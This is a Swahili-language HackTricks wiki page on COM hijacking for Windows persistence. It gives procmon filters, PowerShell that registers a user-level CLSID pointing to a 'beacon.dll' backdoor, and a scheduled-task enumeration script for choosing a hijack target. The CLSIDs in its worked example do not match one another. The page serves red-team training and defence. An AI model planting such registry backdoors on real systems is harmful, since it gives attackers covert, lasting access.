Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

COM Hijacking

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Kutafuta vipengele vya COM visivyokuwepo

Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, COM Hijacking inaweza kutumika kama njia ya kudumu. Kwa kutumia procmon, ni rahisi kupata usajili wa COM uliotafutwa ambao haupo ambao mshambuliaji anaweza kuunda ili kudumu. Vichujio:

  • Operesheni za RegOpenKey.

  • ambapo Matokeo ni JINA HALIJAPATIKANA.

  • na Njia inamalizika na InprocServer32.

Baada ya kuamua ni COM ipi isiyokuwepo ya kuiga, tekeleza amri zifuatazo. Jihadhari ikiwa utaamua kuiga COM ambayo inapakia kila sekunde chache kwani hiyo inaweza kuwa ni mzigo mkubwa.

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Vipengele vya COM vya Task Scheduler vinavyoweza kutekwa

Kazi za Windows hutumia Vichocheo Maalum kuwaita vitu vya COM na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri wakati zitakapofanyika.

# Onyesha COM CLSIDs
$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
    if ($Task.Actions.ClassId -ne $null)
    {
        if ($Task.Triggers.Enabled -eq $true)
        {
            $usersSid = "S-1-5-32-545"
            $usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }

            if ($Task.Principal.GroupId -eq $usersGroup)
            {
                Write-Host "Task Name: " $Task.TaskName
                Write-Host "Task Path: " $Task.TaskPath
                Write-Host "CLSID: " $Task.Actions.ClassId
                Write-Host
            }
        }
    }
}

# Matokeo ya mfano:
# Task Name:  Example
# Task Path:  \Microsoft\Windows\Example\
# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
# [zaidi kama hii ya awali...]

Kwa kuangalia matokeo, unaweza kuchagua moja ambayo itatekelezwa kila wakati mtumiaji anapoingia kwa mfano.

Sasa tafuta CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} katika HKEY_CLASSES_ROOT\CLSID na katika HKLM na HKCU, kawaida utagundua kuwa thamani haipo katika HKCU.

# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.

Kisha, unaweza tu kuunda kuingia kwa HKCU na kila wakati mtumiaji anapoingia, mlango wako wa nyuma utafanya kazi.

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousCreate MSI with WIXNextDll Hijacking

Last updated